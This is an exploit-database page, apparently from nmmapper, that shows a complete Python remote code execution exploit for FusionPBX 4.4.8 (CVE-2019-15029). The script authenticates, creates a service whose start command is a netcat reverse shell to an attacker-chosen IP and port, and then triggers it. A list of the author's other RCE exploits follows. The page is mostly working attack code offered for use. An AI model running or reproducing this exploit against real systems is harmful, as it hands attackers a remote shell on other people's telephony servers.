Search for hundreds of thousands of exploits

"FusionPBX 4.4.8 - Remote Code Execution"

Author

Exploit author

Askar

Platform

Exploit platform

linux

Release date

Exploit published date

2019-09-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python3

'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")

    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]


request = requests.session()

login_info = {
    "username": username,
    "password": password
}

login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
     login_info, verify=False
 )


if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
    # the service name you want to create
    "service_name":"PwnedService3",
    "service_type":"pid",
    "service_data":"1",

    # this value contains the payload , you can change it as you want
    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop":"stop",
    "service_description":"desc",
    "submit":"Save"
}

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)

soup = BeautifulSoup(html_page.text, "lxml")

for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)
Release DateTitleTypePlatformAuthor
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-04-29"Open-AudIT Professional 3.3.1 - Remote Code Execution"webappsphpAskar
2020-02-24"Cacti 1.2.8 - Remote Code Execution"webappsphpAskar
2020-02-03"Cacti 1.2.8 - Authenticated Remote Code Execution"webappsmultipleAskar
2020-02-03"Cacti 1.2.8 - Unauthenticated Remote Code Execution"webappsmultipleAskar
2020-01-10"Pandora 7.0NG - Remote Code Execution"webappsphpAskar
2019-10-29"rConfig 3.9.2 - Remote Code Execution"webappsphpAskar
2019-09-06"FusionPBX 4.4.8 - Remote Code Execution"remotelinuxAskar
2019-07-02"Centreon 19.04 - Remote Code Execution"webappsphpAskar
2019-06-28"LibreNMS 1.46 - 'addhost' Remote Code Execution"webappsphpAskar
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47358/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.